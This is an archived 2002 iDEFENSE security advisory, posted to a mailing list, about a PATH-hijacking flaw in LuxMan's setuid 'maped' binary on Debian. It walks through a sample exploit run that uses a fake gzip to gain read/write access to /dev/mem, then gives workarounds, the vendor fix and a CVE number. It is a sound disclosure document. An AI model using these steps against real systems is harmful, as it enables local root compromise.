OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: David Endler (dendler_at_idefense.com)
Date: Wed Nov 06 2002 - 10:56:34 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    iDEFENSE Security Advisory 11.06.02:
    http://www.idefense.com/advisory/11.06.02.txt
    Non-Explicit Path Vulnerability in LuxMan
    November 6, 2002

    I. BACKGROUND

    Frank McIngvale's LuxMan is a Linux-based game similar to Pac Man.
    More information about it is available at
    http://packages.debian.org/stable/games/luxman.html.

    II. DESCRIPTION

    Maped is a setuid binary that belongs to LuxMan. It executes gzip
    without using the full path. A local attacker can create an
    exploit binary named gzip and have maped execute it by properly
    modifying the path environment variable. The following is a
    sample run and explanation of an exploit that will duplicate /dev/mem
    to /tmp/mem:

    First, the attacker sets the current working directory into the path
    environment variable:

    farmerdebian30:~$ export | grep PATH declare -x
    PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
    farmerdebian30:~$ declare -x
    PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
    farmerdebian30:~$ export | grep PATH declare -x
    PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"

    Second, the attacker compiles the exploit as a binary named gzip and
    creates a fake archive:

    farmerdebian30:~$ cc gzip.c -o gzip
    farmerdebian30:~$ touch test.gz

    Third, the attacker executes the maped binary:

    farmerdebian30:~$ `which maped` test.gz
    You must be the owner of the current console to use svgalib.
    Not running in a graphics capable console,
    and unable to find one.
    Using VGA driver.
    svgalib 1.4.3
    ...

    At this point, /dev/mem is being duplicated into /dev/tmp. The
    descriptor to /dev/mem can be analyzed in a separate terminal:

    farmerdebian30:~$ lsof | grep /dev/mem
    gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem

    farmerdebian30:~$ cd /proc/5197/fd/
    farmerdebian30:~$ ls -l
    total 0
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1
    l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991]
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem
    lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem

    It is clear that descriptor 5 is a read write descriptor to /dev/mem.

    III. ANALYSIS

    Any local user can launch this attack to gain read/write access to
    /dev/mem. Such access can lead to local root compromise.
    Exploitation is possible by scanning the file for fragments of the
    master password file and modifying kernel memory to re-map
    system calls.

    IV. DETECTION

    LuxMan 0.41, which is packaged and distributed with Debian Linux
    3.0r0, is vulnerable. It is probable that the same LuxMan
    version is vulnerable on other platforms as well.

    V. WORKAROUND

    Customers should consider one of the two following options:

    Option 1: Remove the LuxMan package by issuing the command "# apt-get
    remove luxman".

    Option 2: Remove the setuid bit from the maped binary by executing
    the command "# chmod -s `which maped`".

    VI. VENDOR RESPONSE

    The Debian Project has made available an updated LuxMan package that
    fixes this vulnerability. More information should be
    available in DSA-189 at http://www.debian.org/security/2002/dsa-189 .
     
    VII. CVE INFORMATION

    The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
    assigned the identification number CAN-2002-1245 to this
    issue.

    VIII. DISCLOSURE TIMELINE

    10/03/2002 Issue disclosed to iDEFENSE
    10/31/2002 Maintainer, Janos Lenart (ocsidebian.org), and
                    securitydebian.org notified
    10/31/2002 iDEFENSE clients notified
    11/02/2002 Responses received from ocsidebian.org and Martin Schulze
                    (joeyinfodrom.org)
    11/06/2002 Public disclosure

    IX. CREDIT

    Texonet (http://www.texonet.com) discovered this vulnerability.

    Get paid for security research
    http://www.idefense.com/contributor.html

    Subscribe to iDEFENSE Advisories:
    send email to listservidefense.com, subject line: "subscribe"

    About iDEFENSE:

    iDEFENSE is a global security intelligence company that proactively
    monitors sources throughout the world from technical
    vulnerabilities and hacker profiling to the global spread of viruses
    and other malicious code. Our security intelligence services provide
    decision-makers, frontline security professionals and network
    administrators with timely access to actionable intelligence
    and decision support on cyber-related threats. For more information,
    visit http://www.idefense.com.

    - -dave

    David Endler, CISSP
    Director, Technical Intelligence
    iDEFENSE, Inc.
    14151 Newbrook Drive
    Suite 100
    Chantilly, VA 20151
    voice: 703-344-2632
    fax: 703-961-1071

    dendleridefense.com
    www.idefense.com

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.1.2
    Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

    iQA/AwUBPclF1UrdNYRLCswqEQLR5ACgyXFDjuXKXSkUb7pa4GGMEk+3GGsAn0Hf
    feitp98Q3xxQr1bg1oMwIUBs
    =WLLe
    -----END PGP SIGNATURE-----